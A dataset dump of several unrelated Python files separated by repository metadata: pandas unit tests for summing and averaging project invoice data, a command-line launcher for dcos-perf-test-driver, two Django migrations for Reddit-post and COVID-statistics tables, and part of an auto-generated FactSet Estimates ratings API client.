        project2_invoice_weeks = pd.date_range(date_today+pd.Timedelta(3, unit='W'), periods=3, freq='W')
        project2 = pd.DataFrame(index=project2_invoice_weeks, data={'X': [10, 10, 10],
                                                                    'Y': [30, 40, 50],
                                                                    'CPI': [100, 20, 100]})
        for idx, project in enumerate((project1, project2)):
            adder.add_project_data(total, project, idx, column_to_average=('CPI'))
        expected_results_weeks = project1_invoice_weeks.union(project2_invoice_weeks)
        expected_result = pd.DataFrame(index=expected_results_weeks, data={ 'X': [40, 50, 60, 70, 70, 70],
                                                                            'Y': [10000, 20000, 30000, 30000+30, 30000+40, 30000+50],
                                                                            'CPI': [10, 20, 30,
                                                                                    (100+30)/2, (20+30)/2, (100+30)/2]},
                                       dtype=float)
        expected_result.sort_index(inplace=True, axis=1)
        self.assertTrue(total.equals(expected_result))
    def test_finishing_late_overlap(self):
        # project2 starts 2 weeks in, so its first week coincides with
        # project1's last week; that week is a true sum/average of both.
        total = pd.DataFrame(columns=['X', 'Y', 'CPI'], dtype=float)
        date_today = datetime.now()
        project1_invoice_weeks = pd.date_range(date_today, periods=3, freq='W')
        project1 = pd.DataFrame(index=project1_invoice_weeks, data={'X': [40, 50, 60],
                                                                    'Y': [10000, 20000, 30000],
                                                                    'CPI': [10, 20, 30]})
        project2_invoice_weeks = pd.date_range(date_today+pd.Timedelta(2, unit='W'), periods=3, freq='W')
        project2 = pd.DataFrame(index=project2_invoice_weeks, data={'X': [10, 10, 10],
                                                                    'Y': [30, 40, 50],
                                                                    'CPI': [100, 20, 100]})
        for idx, project in enumerate((project1, project2)):
            adder.add_project_data(total, project, idx, column_to_average=('CPI'))
        expected_results_weeks = project1_invoice_weeks.union(project2_invoice_weeks)
        expected_result = pd.DataFrame(index=expected_results_weeks, data={ 'X': [40, 50, 70, 70, 70],
                                                                            'Y': [10000, 20000, 30000+30, 30000+40, 30000+50],
                                                                            'CPI': [10, 20,
                                                                                    (100+30)/2, (20+30)/2, (100+30)/2]},
                                       dtype=float)
        expected_result.sort_index(inplace=True, axis=1)
        self.assertTrue(total.equals(expected_result))
    def test_starting_early_no_overlap(self):
        # Mirror of the finishing-late case: project2 covers the 3 weeks
        # BEFORE project1 starts, so the early weeks are project2-only and
        # the later weeks combine project1 with project2's final row.
        total = pd.DataFrame(columns=['X', 'Y', 'CPI'], dtype=float)
        date_today = datetime.now()
        project1_invoice_weeks = pd.date_range(date_today, periods=3, freq='W')
        project1 = pd.DataFrame(index=project1_invoice_weeks, data={'X': [40, 50, 60],
                                                                    'Y': [10000, 20000, 30000],
                                                                    'CPI': [10, 20, 30]})
        project2_invoice_weeks = pd.date_range(date_today-pd.Timedelta(3, unit='W'), periods=3, freq='W')
        project2 = pd.DataFrame(index=project2_invoice_weeks, data={'X': [10, 10, 10],
                                                                    'Y': [30, 40, 50],
                                                                    'CPI': [100, 20, 100]})
        for idx, project in enumerate((project1, project2)):
            adder.add_project_data(total, project, idx, column_to_average=('CPI'))
        expected_results_weeks = project1_invoice_weeks.union(project2_invoice_weeks)
        expected_result = pd.DataFrame(index=expected_results_weeks, data={ 'X': [10, 10, 10, 50, 60, 70],
                                                                            'Y': [30, 40, 50, 10000+50, 20000+50, 30000+50],
                                                                            'CPI': [100, 20, 100,
                                                                                    (100+10)/2, (100+20)/2, (100+30)/2]},
                                       dtype=float)
        expected_result.sort_index(inplace=True, axis=1)
        self.assertTrue(total.equals(expected_result))
    def test_starting_early_overlap(self):
        # project2 starts 2 weeks early: its last week coincides with
        # project1's first week, so the shared weeks sum/average both.
        total = pd.DataFrame(columns=['X', 'Y', 'CPI'], dtype=float)
        date_today = datetime.now()
        project1_invoice_weeks = pd.date_range(date_today, periods=3, freq='W')
        project1 = pd.DataFrame(index=project1_invoice_weeks, data={'X': [40, 50, 60],
                                                                    'Y': [10000, 20000, 30000],
                                                                    'CPI': [10, 20, 30]})
        project2_invoice_weeks = pd.date_range(date_today-pd.Timedelta(2, unit='W'), periods=3, freq='W')
        project2 = pd.DataFrame(index=project2_invoice_weeks, data={'X': [10, 10, 10],
                                                                    'Y': [30, 40, 50],
                                                                    'CPI': [100, 20, 100]})
        for idx, project in enumerate((project1, project2)):
            adder.add_project_data(total, project, idx, column_to_average=('CPI'))
        expected_results_weeks = project1_invoice_weeks.union(project2_invoice_weeks)
        expected_result = pd.DataFrame(index=expected_results_weeks, data={ 'X': [10, 10, 50, 60, 70],
                                                                            'Y': [30, 40, 10000+50, 20000+50, 30000+50],
                                                                            'CPI': [100, 20,
                                                                                    (100+10)/2, (100+20)/2, (100+30)/2]},
                                       dtype=float)
        expected_result.sort_index(inplace=True, axis=1)
        self.assertTrue(total.equals(expected_result))
class AdderGaps(unittest.TestCase):
    """
    Test with Gaps

    Projects whose invoice-week index is missing rows in the middle: for
    the gap weeks the summed columns carry only the remaining project's
    values and 'CPI' is averaged only where both projects have data.
    """
    def test_date_gap(self):
        # project2 drops positional index 2 twice, i.e. its 3rd and 4th
        # invoice weeks are missing; those weeks must show project1's
        # unmodified values (60/70, 30000/100, CPI 30/40).
        total = pd.DataFrame(columns=['X', 'Y', 'CPI'], dtype=float)
        date_today = datetime.now()
        invoice_weeks = pd.date_range(date_today, periods=6, freq='W')
        project1 = pd.DataFrame(index=invoice_weeks, data={'X': [40, 50, 60, 70, 80, 90],
                                                           'Y': [10000, 20000, 30000, 100, 300, 300],
                                                           'CPI': [10, 20, 30, 40, 50, 60]})
        project2 = pd.DataFrame(index=invoice_weeks, data={'X': [1, 2, 3, 4, 5, 6],
                                                           'Y': [7, 8, 9, 10, 11, 12],
                                                           'CPI': [13, 14, 15, 16, 17, 18]})
        project2.drop(project2.index[2], inplace=True)
        project2.drop(project2.index[2], inplace=True)
        for idx, project in enumerate((project1, project2)):
            adder.add_project_data(total, project, idx, column_to_average=('CPI'))
        expected_result = pd.DataFrame(index=invoice_weeks, data={'X': [40+1, 50+2, 60, 70, 80+5, 90+6],
                                                                  'Y': [10000+7, 20000+8, 30000, 100, 300+11, 300+12],
                                                                  'CPI': [(10+13)/2, (20+14)/2, 30, 40, (50+17)/2, (60+18)/2]},
                                       dtype=float)
        expected_result.sort_index(inplace=True, axis=1)
        self.assertTrue(total.equals(expected_result))
    def test_date_gap2(self):
        # NOTE(review): this test is an exact duplicate of test_date_gap
        # above (only the formatting of the expected-result literal
        # differs); consider removing one of the two.
        total = pd.DataFrame(columns=['X', 'Y', 'CPI'], dtype=float)
        date_today = datetime.now()
        invoice_weeks = pd.date_range(date_today, periods=6, freq='W')
        project1 = pd.DataFrame(index=invoice_weeks, data={'X': [40, 50, 60, 70, 80, 90],
                                                           'Y': [10000, 20000, 30000, 100, 300, 300],
                                                           'CPI': [10, 20, 30, 40, 50, 60]})
        project2 = pd.DataFrame(index=invoice_weeks, data={'X': [1, 2, 3, 4, 5, 6],
                                                           'Y': [7, 8, 9, 10, 11, 12],
                                                           'CPI': [13, 14, 15, 16, 17, 18]})
        project2.drop(project2.index[2], inplace=True)
        project2.drop(project2.index[2], inplace=True)
        for idx, project in enumerate((project1, project2)):
            adder.add_project_data(total, project, idx, column_to_average=('CPI'))
        expected_result = pd.DataFrame(index=invoice_weeks, data={'X': [40 + 1, 50 + 2, 60, 70, 80 + 5, 90 + 6],
                                                                  'Y': [10000 + 7, 20000 + 8, 30000, 100, 300 + 11,
                                                                        300 + 12],
                                                                  'CPI': [(10 + 13) / 2, (20 + 14) / 2, 30, 40,
                                                                          (50 + 17) / 2, (60 + 18) / 2]},
                                       dtype=float)
        expected_result.sort_index(inplace=True, axis=1)
        self.assertTrue(total.equals(expected_result))
| 53
| 133
| 0.440859
| 1,281
| 12,614
| 4.186573
| 0.08587
| 0.087265
| 0.068618
| 0.060227
| 0.94518
| 0.94518
| 0.94518
| 0.937535
| 0.912735
| 0.902293
| 0
| 0.129606
| 0.4342
| 12,614
| 238
| 134
| 53
| 0.62183
| 0.003171
| 0
| 0.714286
| 0
| 0
| 0.015306
| 0
| 0
| 0
| 0
| 0
| 0.049689
| 1
| 0.049689
| false
| 0
| 0.024845
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3a08091ac85a3254addc29750a11736e808bc700
| 154
|
py
|
Python
|
dcos-perf-test-driver.py
|
mesosphere/dcos-perf-test-driver
|
8fba87cb6c6f64690c0b5bef5c7d9f2aa0fba06b
|
[
"Apache-2.0"
] | 2
|
2018-02-27T18:21:21.000Z
|
2018-03-16T12:12:12.000Z
|
dcos-perf-test-driver.py
|
mesosphere/dcos-perf-test-driver
|
8fba87cb6c6f64690c0b5bef5c7d9f2aa0fba06b
|
[
"Apache-2.0"
] | 1
|
2018-06-25T07:14:41.000Z
|
2018-06-25T07:14:41.000Z
|
dcos-perf-test-driver.py
|
mesosphere/dcos-perf-test-driver
|
8fba87cb6c6f64690c0b5bef5c7d9f2aa0fba06b
|
[
"Apache-2.0"
] | 1
|
2020-06-25T10:37:21.000Z
|
2020-06-25T10:37:21.000Z
|
#!/usr/bin/env python3
"""Command-line launcher for dcos-perf-test-driver.

Forwards all command-line arguments (minus the program name) to the
driver's entry point and exits with whatever status code it returns.
"""
import sys

from performance.driver.core.cli.entrypoints import dcos_perf_test_driver

# Guard the launch so importing this module (e.g. from tooling or tests)
# does not immediately run the driver and call sys.exit().
if __name__ == "__main__":
    sys.exit(dcos_perf_test_driver(sys.argv[1:]))
| 30.8
| 73
| 0.824675
| 26
| 154
| 4.653846
| 0.692308
| 0.132231
| 0.198347
| 0.297521
| 0.347107
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013793
| 0.058442
| 154
| 4
| 74
| 38.5
| 0.82069
| 0.136364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3a1683a99f7f78f056a4688fc45b959a3be7a5a7
| 3,300
|
py
|
Python
|
velkozz_web_api/apps/social_media_api/migrations/0001_initial.py
|
velkoz-data-ingestion/velkozz_web_api
|
519a6a90e5fdf5bab8ba2daf637768c5fd424a12
|
[
"MIT"
] | null | null | null |
velkozz_web_api/apps/social_media_api/migrations/0001_initial.py
|
velkoz-data-ingestion/velkozz_web_api
|
519a6a90e5fdf5bab8ba2daf637768c5fd424a12
|
[
"MIT"
] | null | null | null |
velkozz_web_api/apps/social_media_api/migrations/0001_initial.py
|
velkoz-data-ingestion/velkozz_web_api
|
519a6a90e5fdf5bab8ba2daf637768c5fd424a12
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.5 on 2021-02-09 19:59
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema for the social-media API app.

    Auto-generated by Django (see header comment); creates two identical
    Reddit-post tables that differ only in their default ``subreddit``
    value and verbose name. Do not hand-edit the operations -- regenerate
    instead.
    """
    initial = True
    dependencies = [
    ]
    operations = [
        # Snapshot table for posts scraped from r/science.
        migrations.CreateModel(
            name='SciencePosts',
            fields=[
                # Reddit's own post id is reused as the primary key.
                ('id', models.CharField(db_index=True, max_length=20, primary_key=True, serialize=False, unique=True)),
                ('title', models.CharField(max_length=300)),
                ('content', models.TextField(null=True)),
                ('upvote_ratio', models.FloatField(null=True)),
                ('score', models.IntegerField(null=True)),
                ('num_comments', models.IntegerField(null=True)),
                ('created_on', models.DateTimeField()),
                ('stickied', models.BooleanField(null=True)),
                ('over_18', models.BooleanField(null=True)),
                ('spoiler', models.BooleanField(null=True)),
                ('author_is_gold', models.BooleanField(null=True)),
                ('author_mod', models.BooleanField(null=True)),
                ('author_has_verified_email', models.BooleanField(null=True)),
                ('permalink', models.URLField(max_length=300, null=True)),
                ('author', models.CharField(max_length=300)),
                ('author_created', models.DateTimeField()),
                ('comment_karma', models.IntegerField(null=True)),
                # Fixed, non-editable subreddit tag identifying the source.
                ('subreddit', models.CharField(default='science', editable=False, max_length=200)),
            ],
            options={
                'verbose_name_plural': 'Science Subreddit Posts',
                'ordering': ['created_on'],
                'abstract': False,
            },
        ),
        # Snapshot table for posts scraped from r/wallstreetbets; same
        # columns as SciencePosts apart from the subreddit default.
        migrations.CreateModel(
            name='WallStreetBetsPosts',
            fields=[
                ('id', models.CharField(db_index=True, max_length=20, primary_key=True, serialize=False, unique=True)),
                ('title', models.CharField(max_length=300)),
                ('content', models.TextField(null=True)),
                ('upvote_ratio', models.FloatField(null=True)),
                ('score', models.IntegerField(null=True)),
                ('num_comments', models.IntegerField(null=True)),
                ('created_on', models.DateTimeField()),
                ('stickied', models.BooleanField(null=True)),
                ('over_18', models.BooleanField(null=True)),
                ('spoiler', models.BooleanField(null=True)),
                ('author_is_gold', models.BooleanField(null=True)),
                ('author_mod', models.BooleanField(null=True)),
                ('author_has_verified_email', models.BooleanField(null=True)),
                ('permalink', models.URLField(max_length=300, null=True)),
                ('author', models.CharField(max_length=300)),
                ('author_created', models.DateTimeField()),
                ('comment_karma', models.IntegerField(null=True)),
                ('subreddit', models.CharField(default='wallstreetbets', editable=False, max_length=200)),
            ],
            options={
                'verbose_name_plural': 'WallStreetBets Subreddit Posts',
                'ordering': ['created_on'],
                'abstract': False,
            },
        ),
    ]
| 46.478873
| 119
| 0.555455
| 298
| 3,300
| 6.003356
| 0.271812
| 0.107323
| 0.147568
| 0.174399
| 0.856344
| 0.856344
| 0.856344
| 0.807155
| 0.807155
| 0.752376
| 0
| 0.020364
| 0.300606
| 3,300
| 70
| 120
| 47.142857
| 0.754766
| 0.013636
| 0
| 0.761905
| 1
| 0
| 0.167538
| 0.01537
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.015873
| 0
| 0.079365
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3a3612fba113676b19197299e6acc4985413dfa5
| 2,303
|
py
|
Python
|
app/core/migrations/0010_indiacovidstats_worldcovidstats.py
|
mzs9540/covid19
|
efe8b6e243f576f728a91fc5cde00b1ac0990ac1
|
[
"MIT"
] | 1
|
2020-04-27T15:20:15.000Z
|
2020-04-27T15:20:15.000Z
|
app/core/migrations/0010_indiacovidstats_worldcovidstats.py
|
mzs9540/covid19
|
efe8b6e243f576f728a91fc5cde00b1ac0990ac1
|
[
"MIT"
] | null | null | null |
app/core/migrations/0010_indiacovidstats_worldcovidstats.py
|
mzs9540/covid19
|
efe8b6e243f576f728a91fc5cde00b1ac0990ac1
|
[
"MIT"
] | 1
|
2020-05-30T13:55:22.000Z
|
2020-05-30T13:55:22.000Z
|
# Generated by Django 3.0.5 on 2020-04-26 14:14
from django.db import migrations, models
class Migration(migrations.Migration):
    """Adds the IndiaCovidStats and WorldCovidStats tables.

    Auto-generated by Django (see header comment). The two models are
    structurally identical except for their first column (``city`` vs
    ``country``).

    NOTE(review): every statistic (case counts, per-million rates, tests)
    is stored as a CharField rather than a numeric type -- presumably the
    scraped values include non-numeric markers; confirm before querying
    these columns numerically.
    """
    dependencies = [
        ('core', '0009_auto_20200426_0835'),
    ]
    operations = [
        # Per-city (state) COVID-19 statistics for India.
        migrations.CreateModel(
            name='IndiaCovidStats',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('city', models.CharField(max_length=30)),
                ('total_case', models.CharField(max_length=20)),
                ('new_case', models.CharField(max_length=20)),
                ('total_death', models.CharField(max_length=20)),
                ('new_death', models.CharField(max_length=20)),
                ('total_recovered', models.CharField(max_length=20)),
                ('active_case', models.CharField(max_length=20)),
                ('serious_critical', models.CharField(max_length=20)),
                ('cases_per_million', models.CharField(max_length=20)),
                ('deaths_per_million', models.CharField(max_length=20)),
                ('total_test', models.CharField(max_length=20)),
                ('test_per_million', models.CharField(max_length=20)),
            ],
        ),
        # Per-country worldwide COVID-19 statistics; same columns as
        # IndiaCovidStats with 'country' in place of 'city'.
        migrations.CreateModel(
            name='WorldCovidStats',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('country', models.CharField(max_length=30)),
                ('total_case', models.CharField(max_length=20)),
                ('new_case', models.CharField(max_length=20)),
                ('total_death', models.CharField(max_length=20)),
                ('new_death', models.CharField(max_length=20)),
                ('total_recovered', models.CharField(max_length=20)),
                ('active_case', models.CharField(max_length=20)),
                ('serious_critical', models.CharField(max_length=20)),
                ('cases_per_million', models.CharField(max_length=20)),
                ('deaths_per_million', models.CharField(max_length=20)),
                ('total_test', models.CharField(max_length=20)),
                ('test_per_million', models.CharField(max_length=20)),
            ],
        ),
    ]
| 46.06
| 114
| 0.579679
| 239
| 2,303
| 5.330544
| 0.246862
| 0.282575
| 0.339089
| 0.452119
| 0.813187
| 0.813187
| 0.813187
| 0.813187
| 0.813187
| 0.813187
| 0
| 0.047562
| 0.278767
| 2,303
| 49
| 115
| 47
| 0.719446
| 0.01954
| 0
| 0.744186
| 1
| 0
| 0.158688
| 0.010195
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.023256
| 0
| 0.093023
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
28a90038d9f45c4db424cf0a561735e6895fc38a
| 59,385
|
py
|
Python
|
code/python/FactSetEstimates/v2/fds/sdk/FactSetEstimates/api/ratings_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 6
|
2022-02-07T16:34:18.000Z
|
2022-03-30T08:04:57.000Z
|
code/python/FactSetEstimates/v2/fds/sdk/FactSetEstimates/api/ratings_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 2
|
2022-02-07T05:25:57.000Z
|
2022-03-07T14:18:04.000Z
|
code/python/FactSetEstimates/v2/fds/sdk/FactSetEstimates/api/ratings_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | null | null | null |
"""
FactSet Estimates
Gain access to 20+ years of comprehensive estimates and statistics of over 250+ estimated metrics, including financial statement items, product segments, geosegments, and industry metrics. FactSet's consensus estimates are aggregated from a wide base of over 800+ contributors and cover over 19,000 active companies across 90+ countries. Data returned can be accessed on the data frequencies based on quarterly, fiscal years, and calendar years. FactSet Estimates updates on a real time basis intraday (every 5 minutes). Updating times vary based on earning season vs. non-earning season but the goal is to have the data available to the client within a few hours that FactSet receives updated information. Often times updates times can be much faster as FactSet has always been known as one of the fastest estimate providers in the market. # noqa: E501
The version of the OpenAPI document: 2.3.0
Contact: api@factset.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from multiprocessing.pool import ApplyResult
import typing
from fds.sdk.FactSetEstimates.api_client import ApiClient, Endpoint as _Endpoint
from fds.sdk.FactSetEstimates.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from fds.sdk.FactSetEstimates.exceptions import ApiException
from fds.sdk.FactSetEstimates.model.consensus_ratings_request import ConsensusRatingsRequest
from fds.sdk.FactSetEstimates.model.consensus_ratings_response import ConsensusRatingsResponse
from fds.sdk.FactSetEstimates.model.detail_ratings_request import DetailRatingsRequest
from fds.sdk.FactSetEstimates.model.detail_ratings_response import DetailRatingsResponse
from fds.sdk.FactSetEstimates.model.error_response import ErrorResponse
class RatingsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
    def __init__(self, api_client=None):
        """Build the four ratings endpoint descriptors on *api_client*.

        Args:
            api_client (ApiClient, optional): transport/serialization
                client shared by all endpoints; a default-configured
                ApiClient() is created when None is given.
        """
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client
        # GET /factset-estimates/v2/consensus-ratings -- parameters in the
        # query string; 'ids' is required, limited to 1..3000 items, and
        # sent as a csv list; 'frequency' is restricted to D/W/AM/AQ/AY.
        self.get_consensus_ratings_endpoint = _Endpoint(
            settings={
                'response_type': (
                    { 200: (ConsensusRatingsResponse,), 400: (ErrorResponse,), 401: (ErrorResponse,), 403: (ErrorResponse,), 415: (ErrorResponse,), 500: (ErrorResponse,), },
                    None
                ),
                'auth': [
                    'FactSetApiKey',
                    'FactSetOAuth2'
                ],
                'endpoint_path': '/factset-estimates/v2/consensus-ratings',
                'operation_id': 'get_consensus_ratings',
                'http_method': 'GET',
                'servers': None,
            },
            params_map={
                'all': [
                    'ids',
                    'start_date',
                    'end_date',
                    'frequency',
                ],
                'required': [
                    'ids',
                ],
                'nullable': [
                ],
                'enum': [
                    'frequency',
                ],
                'validation': [
                    'ids',
                ]
            },
            root_map={
                'validations': {
                    ('ids',): {
                        'max_items': 3000,
                        'min_items': 1,
                    },
                },
                'allowed_values': {
                    ('frequency',): {

                        "D": "D",
                        "W": "W",
                        "AM": "AM",
                        "AQ": "AQ",
                        "AY": "AY"
                    },
                },
                'openapi_types': {
                    'ids':
                        ([str],),
                    'start_date':
                        (str,),
                    'end_date':
                        (str,),
                    'frequency':
                        (str,),
                },
                'attribute_map': {
                    'ids': 'ids',
                    'start_date': 'startDate',
                    'end_date': 'endDate',
                    'frequency': 'frequency',
                },
                'location_map': {
                    'ids': 'query',
                    'start_date': 'query',
                    'end_date': 'query',
                    'frequency': 'query',
                },
                'collection_format_map': {
                    'ids': 'csv',
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [],
            },
            api_client=api_client
        )
        # POST variant of the same consensus-ratings path: the single
        # required parameter is a ConsensusRatingsRequest sent as the body.
        self.get_consensus_ratings_for_list_endpoint = _Endpoint(
            settings={
                'response_type': (
                    { 200: (ConsensusRatingsResponse,), 400: (ErrorResponse,), 401: (ErrorResponse,), 403: (ErrorResponse,), 415: (ErrorResponse,), 500: (ErrorResponse,), },
                    None
                ),
                'auth': [
                    'FactSetApiKey',
                    'FactSetOAuth2'
                ],
                'endpoint_path': '/factset-estimates/v2/consensus-ratings',
                'operation_id': 'get_consensus_ratings_for_list',
                'http_method': 'POST',
                'servers': None,
            },
            params_map={
                'all': [
                    'consensus_ratings_request',
                ],
                'required': [
                    'consensus_ratings_request',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'consensus_ratings_request':
                        (ConsensusRatingsRequest,),
                },
                'attribute_map': {
                },
                'location_map': {
                    'consensus_ratings_request': 'body',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [
                    'application/json'
                ]
            },
            api_client=api_client
        )
        # GET /factset-estimates/v2/detail-ratings -- like the consensus
        # GET endpoint but without a 'frequency' parameter.
        self.get_detail_ratings_endpoint = _Endpoint(
            settings={
                'response_type': (
                    { 200: (DetailRatingsResponse,), 400: (ErrorResponse,), 401: (ErrorResponse,), 403: (ErrorResponse,), 415: (ErrorResponse,), 500: (ErrorResponse,), },
                    None
                ),
                'auth': [
                    'FactSetApiKey',
                    'FactSetOAuth2'
                ],
                'endpoint_path': '/factset-estimates/v2/detail-ratings',
                'operation_id': 'get_detail_ratings',
                'http_method': 'GET',
                'servers': None,
            },
            params_map={
                'all': [
                    'ids',
                    'start_date',
                    'end_date',
                ],
                'required': [
                    'ids',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                    'ids',
                ]
            },
            root_map={
                'validations': {
                    ('ids',): {
                        'max_items': 3000,
                        'min_items': 1,
                    },
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'ids':
                        ([str],),
                    'start_date':
                        (str,),
                    'end_date':
                        (str,),
                },
                'attribute_map': {
                    'ids': 'ids',
                    'start_date': 'startDate',
                    'end_date': 'endDate',
                },
                'location_map': {
                    'ids': 'query',
                    'start_date': 'query',
                    'end_date': 'query',
                },
                'collection_format_map': {
                    'ids': 'csv',
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [],
            },
            api_client=api_client
        )
        # POST variant of detail-ratings: DetailRatingsRequest as the body.
        self.get_detail_ratings_for_list_endpoint = _Endpoint(
            settings={
                'response_type': (
                    { 200: (DetailRatingsResponse,), 400: (ErrorResponse,), 401: (ErrorResponse,), 403: (ErrorResponse,), 415: (ErrorResponse,), 500: (ErrorResponse,), },
                    None
                ),
                'auth': [
                    'FactSetApiKey',
                    'FactSetOAuth2'
                ],
                'endpoint_path': '/factset-estimates/v2/detail-ratings',
                'operation_id': 'get_detail_ratings_for_list',
                'http_method': 'POST',
                'servers': None,
            },
            params_map={
                'all': [
                    'detail_ratings_request',
                ],
                'required': [
                    'detail_ratings_request',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'detail_ratings_request':
                        (DetailRatingsRequest,),
                },
                'attribute_map': {
                },
                'location_map': {
                    'detail_ratings_request': 'body',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [
                    'application/json'
                ]
            },
            api_client=api_client
        )
@staticmethod
def apply_kwargs_defaults(kwargs, return_http_data_only, async_req):
kwargs["async_req"] = async_req
kwargs["_return_http_data_only"] = return_http_data_only
kwargs["_preload_content"] = kwargs.get("_preload_content", True)
kwargs["_request_timeout"] = kwargs.get("_request_timeout", None)
kwargs["_check_input_type"] = kwargs.get("_check_input_type", True)
kwargs["_check_return_type"] = kwargs.get("_check_return_type", True)
kwargs["_spec_property_naming"] = kwargs.get("_spec_property_naming", False)
kwargs["_content_type"] = kwargs.get("_content_type")
kwargs["_host_index"] = kwargs.get("_host_index")
def get_consensus_ratings(
self,
ids,
**kwargs
) -> ConsensusRatingsResponse:
"""Ratings consensus estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Returns ratings from the FactSet Estimates database for current and historical for an individual security using rolling fiscal dates as of a specific date. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
ids ([str]): Security or Entity identifiers. FactSet Identifiers, tickers, CUSIP and SEDOL are accepted input. <p>***ids limit** = 3000 per request*</p> * Make Note - id limit of 3000 for defaults, otherwise the service is limited to a 30 second duration. This can be reached when increasing total number of metrics requested and depth of history. *
Keyword Args:
start_date (str): Start date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
end_date (str): End date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
frequency (str): Controls the frequency of the data returned. * **D** = Daily * **W** = Weekly, based on the last day of the week of the start date. * **AM** = Monthly, based on the start date (e.g., if the start date is June 16, data is displayed for June 16, May 16, April 16 etc.). * **AQ** = Quarterly, based on the start date. * **AY** = Actual Annual, based on the start date. . [optional] if omitted the server will use the default value of "D"
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ConsensusRatingsResponse
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['ids'] = \
ids
return self.get_consensus_ratings_endpoint.call_with_http_info(**kwargs)
def get_consensus_ratings_with_http_info(
self,
ids,
**kwargs
) -> typing.Tuple[ConsensusRatingsResponse, int, typing.MutableMapping]:
"""Ratings consensus estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Returns ratings from the FactSet Estimates database for current and historical for an individual security using rolling fiscal dates as of a specific date. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
ids ([str]): Security or Entity identifiers. FactSet Identifiers, tickers, CUSIP and SEDOL are accepted input. <p>***ids limit** = 3000 per request*</p> * Make Note - id limit of 3000 for defaults, otherwise the service is limited to a 30 second duration. This can be reached when increasing total number of metrics requested and depth of history. *
Keyword Args:
start_date (str): Start date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
end_date (str): End date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
